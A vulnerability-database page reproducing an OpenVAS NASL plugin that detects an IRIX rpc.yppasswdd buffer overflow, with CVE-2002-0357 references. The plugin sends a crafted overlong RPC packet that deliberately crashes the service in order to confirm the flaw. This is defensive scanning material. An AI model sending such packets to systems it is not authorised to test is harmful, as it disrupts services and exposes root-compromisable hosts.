Lucene search
+L

irix rpc.passwd overflow

🗓️ 24 Oct 2008 00:00:00Reported by Copyright (C) 2008 Renaud DeraisonType 
openvas
 openvas
🔗 plugins.openvas.org👁 17 Views

irix rpc.passwd overflow. Remote buffer overflow in yppasswdd allows unauthorized root access

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-0357
1 Sep 200404:00
cve
cvelist
Cvelist
CVE-2002-0357
1 Sep 200404:00
cvelist
euvd
EUVD
EUVD-2002-0354
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-0357
18 Jun 200204:00
nvd
openvas
OpenVAS
irix rpc.passwd overflow
24 Oct 200800:00
openvas
securityvulns
securityvulns
IRIX rpc.passwd vulnerability
5 Jun 200200:00
securityvulns
nessus
Tenable Nessus
IRIX rpc.yppasswdd Unspecified Remote Overflow
8 Jun 200200:00
nessus
cert
CERT
SGI IRIX contains vulnerability in rpc.passwd allowing for root compromise
11 Jul 200200:00
cert
SourceLink
securityfocuswww.securityfocus.com/bid/4939
# SPDX-FileCopyrightText: 2008 Renaud Deraison
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.80034");
  script_version("2023-09-08T05:06:21+0000");
  script_tag(name:"last_modification", value:"2023-09-08 05:06:21 +0000 (Fri, 08 Sep 2023)");
  script_tag(name:"creation_date", value:"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4939");
  script_cve_id("CVE-2002-0357");
  script_xref(name:"OSVDB", value:"834");
  script_tag(name:"cvss_base", value:"7.2");
  script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_name("irix rpc.passwd overflow");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2008 Renaud Deraison");
  script_family("Gain a shell remotely");
  script_dependencies("gb_rpc_portmap_udp_detect.nasl", "yppasswdd.nasl");
  script_mandatory_keys("rpc/portmap/udp/detected");
  script_exclude_keys("rpc/yppasswd/sun_overflow");

  script_tag(name:"solution", value:"Disable this service if you don't use
  it, or see SGI advisory #20020601-01-P.");

  script_tag(name:"summary", value:"The remote RPC service 100009 (yppasswdd) is vulnerable
  to a buffer overflow which allows any user to obtain a root shell on this host.");

  script_tag(name:"solution_type", value:"Mitigation");
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

# This is *NOT* the issue described in CVE-2002-0357, which happens
# to be a logic error for which details have not been leaked at all.

include("rpc.inc");
include("byte_func.inc");

n = get_kb_item("rpc/yppasswd/sun_overflow");
if(n)
  exit(0);

function ping(len, soc)
{
  crp = crap(len-4);

  len_hi = len / 256;
  len_lo = len % 256;

  req = raw_string(0x56, 0x6C, 0x9F, 0x6B,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
                   0x00, 0x01, 0x86, 0xA9, 0x00, 0x00, 0x00, 0x01,
                   0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                   0x00, 0x00, len_hi, len_lo, 0x80, 0x1C, 0x40, 0x11
                   ) +
        crp +
        raw_string(0x00, 0x00, 0x00, 0x02,
                   0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03,
                   0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x03,
                   0x61, 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x02,
                   0x61, 0x61, 0x00, 0x00);
  send(socket:soc, data:req);
  r = recv(socket:soc, length:28);
  if(strlen(r) > 1)
    return(1);
  else
    return(0);
}

port = rpc_get_port(program:100009, protocol:IPPROTO_UDP);
if(!port)
  exit(0);

if(!get_udp_port_state(port))
  exit(0);

soc = open_sock_udp(port);
if(!soc)
  exit(0);

# nb: We forge a bogus RPC request, with a way too long argument. The remote process will die immediately, and hopefully painlessly.
p1 = ping(len:80, soc:soc);
if(p1) {
  p2 = ping(len:4000, soc:soc);
  if(!p2) {
    p3 = ping(len:80, soc:soc);
    if(!p3)
      security_message(port:port, protocol:"udp");
  }
}

close(soc);
exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2023 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 27.2
EPSS0.00424
17